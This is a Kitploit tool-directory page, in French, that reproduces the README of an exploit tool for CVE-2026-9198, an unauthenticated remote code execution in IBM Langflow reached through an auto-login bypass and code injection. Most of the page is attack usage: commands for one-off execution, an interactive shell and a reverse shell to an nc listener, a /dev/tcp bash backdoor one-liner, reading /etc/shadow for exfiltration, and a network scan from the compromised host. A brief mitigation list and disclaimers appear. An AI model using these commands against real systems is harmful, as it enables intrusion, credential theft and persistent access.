Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-9198 — IBM Langflow RCE non authentifiée via contournement de l'auto-connexion | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2026-9198
Génération de PayloadsExploitationExploitation d'Applications WebCommandement et ContrôleAuthentificationRed TeamingOutil d'Accès à Distance
GitHub0xgh057r3c0n/cve-2026-9198

CVE-2026-9198

IBM Langflow RCE non authentifiée via contournement de l'auto-connexion

Voir le dépôt
1il y a 27 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Logo Langflow

🚨 CVE-2026-9198

IBM Langflow OSS - RCE non authentifiée via contournement de l'auto-connexion

License: MIT Python 3.6+ Security


📋 Aperçu

CVE-2026-9198 est une vulnérabilité critique d'exécution de code à distance (RCE) non authentifiée dans IBM Langflow OSS. Cet exploit combine deux vulnérabilités :

  • CVE-2026-9103 : Contournement de l'auto-connexion qui octroie des jetons JWT superutilisateur aux appelants non authentifiés
  • CVE-2026-8481 : Injection de code dans le point de terminaison /api/v1/validate/code qui permet l'exécution arbitraire de code Python

⚠️ AVERTISSEMENT : Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. Toute utilisation non autorisée est illégale.


🚀 Fonctionnalités

  • 🔓 Contournement de l'auto-connexion - Obtient automatiquement un jeton JWT superutilisateur
  • 💻 Pseudo-shell interactif - Invite de commande dynamique avec nom d'utilisateur et répertoire courant
  • 📝 Exécution de commande unique - Exécute des commandes système arbitraires
  • 🔄 Reverse shell - Envoi d'un payload reverse shell en une seule ligne
  • 🎨 Sortie colorée - Retour visuel avec couleurs ANSI
  • ⚡ Rapide et fiable - Conçu avec une gestion d'erreurs robuste

📦 Installation

Prérequis

  • Python 3.6 ou supérieur
  • Gestionnaire de paquets pip

Étape 1 : Cloner le dépôt

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198

Étape 2 : Installer les dépendances

root@kitploit:~
pip install termcolor

Ou installer toutes les dépendances d'un coup :

root@kitploit:~
pip install -r requirements.txt

Étape 3 : Vérifier l'installation

root@kitploit:~
python CVE-2026-9198.py --help

Vous devriez voir le menu d'aide avec toutes les options disponibles.


🎯 Utilisation

Exécution de commande de base

Exécuter une commande unique sur la cible :

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -c "id"

Exemple :

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"

Pseudo-shell interactif

Lancer un shell interactif avec des invites dynamiques :

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --shell

Fonctionnalités :

  • Invite dynamique affichant user@host et le répertoire courant
  • Prise en charge de la commande cd avec mise à jour automatique de l'invite
  • Historique des commandes (selon le terminal)
  • Formatage propre de la sortie

Exemple de session :

root@kitploit:~
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp

Reverse Shell

Envoyer un payload reverse shell à un écouteur :

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>

Exemple :

root@kitploit:~
# On your machine - Start listener
nc -lvnp 4444

# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444

Port personnalisé

Si Langflow s'exécute sur un port non standard :

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"

Exemple :

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"

Utilisation d'un jeton pré-obtenu

Ignorer le processus d'auto-connexion et utiliser un jeton existant :

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"

Configuration du délai d'expiration

Ajuster le délai d'expiration HTTP pour les réseaux plus lents :

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"

📝 Arguments de la ligne de commande


🔧 Exemples

1. Collecte d'informations de base

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"

2. Exploration du système de fichiers

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd

3. Backdoor persistante

root@kitploit:~
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"

4. Scan réseau (depuis la cible)

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"

5. Exfiltration de fichiers sensibles

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"

🛡️ Atténuation

Pour se protéger contre cette vulnérabilité :

  1. Désactiver l'auto-connexion dans les environnements de production
  2. Appliquer les correctifs publiés par IBM pour Langflow
  3. Restreindre l'accès réseau aux interfaces administratives de Langflow
  4. Surveiller les requêtes API inhabituelles vers /api/v1/auto_login et /api/v1/validate/code
  5. Utiliser des règles WAF pour bloquer les modèles de payload suspects

⚠️ Avertissement

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce logiciel. Les utilisateurs sont seuls responsables du respect des lois et règlements applicables.


📄 Licence

Ce projet est distribué sous licence MIT - voir le fichier LICENSE pour plus de détails.


👨‍💻 Auteur

0xgh057r3c0n

  • GitHub : @0xgh057r3c0n
  • Chercheur en sécurité & Pentester

📚 Références

  • Détails CVE-2026-9198
  • CVE-2026-9103 - Contournement de l'auto-connexion
  • CVE-2026-8481 - Injection de code
  • Site officiel de Langflow

🤝 Contribution

Les contributions sont les bienvenues ! N'hésitez pas à soumettre une Pull Request.

  1. Forkez le dépôt
  2. Créez votre branche de fonctionnalité (git checkout -b feature/AmazingFeature)
  3. Commitez vos modifications (git commit -m 'Add some AmazingFeature')
  4. Poussez vers la branche (git push origin feature/AmazingFeature)
  5. Ouvrez une Pull Request

⭐ Historique des étoiles

Si vous trouvez cet outil utile, pensez à lui attribuer une ⭐ sur GitHub !


Fait avec ❤️ par 0xgh057r3c0n
Télécharger l’outil
ArgumentDescriptionRequisValeur par défaut
-t, --targetHôte/IP cible ou URL complète✅ Oui-
-p, --portPort Langflow❌ Non7860
-c, --cmdExécute une commande unique❌ Non"id"
--shellMode pseudo-shell interactif❌ NonFalse
--lhostIP de l'écouteur reverse shell❌ Non-
--lportPort de l'écouteur reverse shell❌ Non4444
-k, --tokenUtilise le jeton bearer fourni❌ Non-
--timeoutDélai d'expiration HTTP en secondes❌ Non20
--no-bannerMasque la bannière❌ NonFalse